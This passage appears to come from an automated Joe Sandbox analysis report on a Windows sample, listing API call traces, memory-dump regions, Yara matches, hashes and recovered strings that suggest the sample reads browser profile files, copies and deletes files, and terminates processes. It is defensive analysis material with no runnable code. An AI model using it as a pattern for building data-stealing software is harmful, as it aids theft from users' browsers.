                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-0
                                                                                                • Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
                                                                                                • Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
                                                                                                • Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
                                                                                                • Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42
                                                                                                APIs
                                                                                                • strcmp.MSVCRT ref: 61EAB012
                                                                                                  • Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: freestrcmp
                                                                                                • String ID: bua$matchinfo$pcx
                                                                                                • API String ID: 716601943-237985100
                                                                                                • Opcode ID: 237be79ab2502c4599ed8e0c574142ccb5a6144a58fc15783e185434153a1b49
                                                                                                • Instruction ID: d7a9de28f1ba4d9dbc53b777f24a38c05efd697a91aa6da7b783da7e5ea27d52
                                                                                                • Opcode Fuzzy Hash: 237be79ab2502c4599ed8e0c574142ccb5a6144a58fc15783e185434153a1b49
                                                                                                • Instruction Fuzzy Hash: 2FE1EE74D043598FEB10CFA8C480B9DBBF1BB49318F64C46AE8A8AB351D775E985CB41
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: strncmp
                                                                                                • String ID: #$-$]
                                                                                                • API String ID: 1114863663-3149169660
                                                                                                • Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
                                                                                                • Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
                                                                                                • Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
                                                                                                • Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                • String ID:
                                                                                                • API String ID: 211194620-0
                                                                                                • Opcode ID: a57b739fca8736a52b6abc5035b419aee29f1535ce02e9d43ebcf486e1eae90b
                                                                                                • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                                                                                • Opcode Fuzzy Hash: a57b739fca8736a52b6abc5035b419aee29f1535ce02e9d43ebcf486e1eae90b
                                                                                                • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                • String ID:
                                                                                                • API String ID: 211194620-0
                                                                                                • Opcode ID: b9a6f4e3650b399750430d183178cababab4e2f4d8e321632e4537772c0efa5f
                                                                                                • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                                                                                • Opcode Fuzzy Hash: b9a6f4e3650b399750430d183178cababab4e2f4d8e321632e4537772c0efa5f
                                                                                                • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                  • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                  • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                  • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                  • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                  • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                  • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                • API String ID: 998311485-3310892237
                                                                                                • Opcode ID: 83b14d8013d4da83b9c040a5c552a9a93fb4a540fb32c06869e663b0d0be2929
                                                                                                • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                                                                                • Opcode Fuzzy Hash: 83b14d8013d4da83b9c040a5c552a9a93fb4a540fb32c06869e663b0d0be2929
                                                                                                • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0041967B
                                                                                                  • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                  • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                  • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419766
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 396451647-0
                                                                                                • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                                                                                • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                                                                                • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                                                                                • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                • wsprintfA.USER32 ref: 004189E0
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                • String ID: %dx%d
                                                                                                • API String ID: 2716131235-2206825331
                                                                                                • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                                                                                • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                                                                                • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                                                                                • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                                                                                • wsprintfA.USER32 ref: 00417B83
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1243822799-0
                                                                                                • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                                                                                • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                                                                                • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: __dllonexit_lock_onexit_unlock
                                                                                                • String ID:
                                                                                                • API String ID: 209411981-0
                                                                                                • Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
                                                                                                • Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
                                                                                                • Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
                                                                                                • Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CFE2D19
                                                                                                • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CFE2D49
                                                                                                • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CFE2D7C
                                                                                                • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CFE2E0A
                                                                                                Strings
                                                                                                • SymGetLineFromInlineContextW, xrefs: 6CFE2D71
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                • String ID: SymGetLineFromInlineContextW
                                                                                                • API String ID: 2190909847-3625368168
                                                                                                • Opcode ID: 03b0bc8d7b08642bab6e480bbb51f94955d0eddeac5071487935af69b38bd567
                                                                                                • Instruction ID: ccb973f01f13ecc1aab84d6ac4304cd0402a533a971854e8c8757e1a046e9b6d
                                                                                                • Opcode Fuzzy Hash: 03b0bc8d7b08642bab6e480bbb51f94955d0eddeac5071487935af69b38bd567
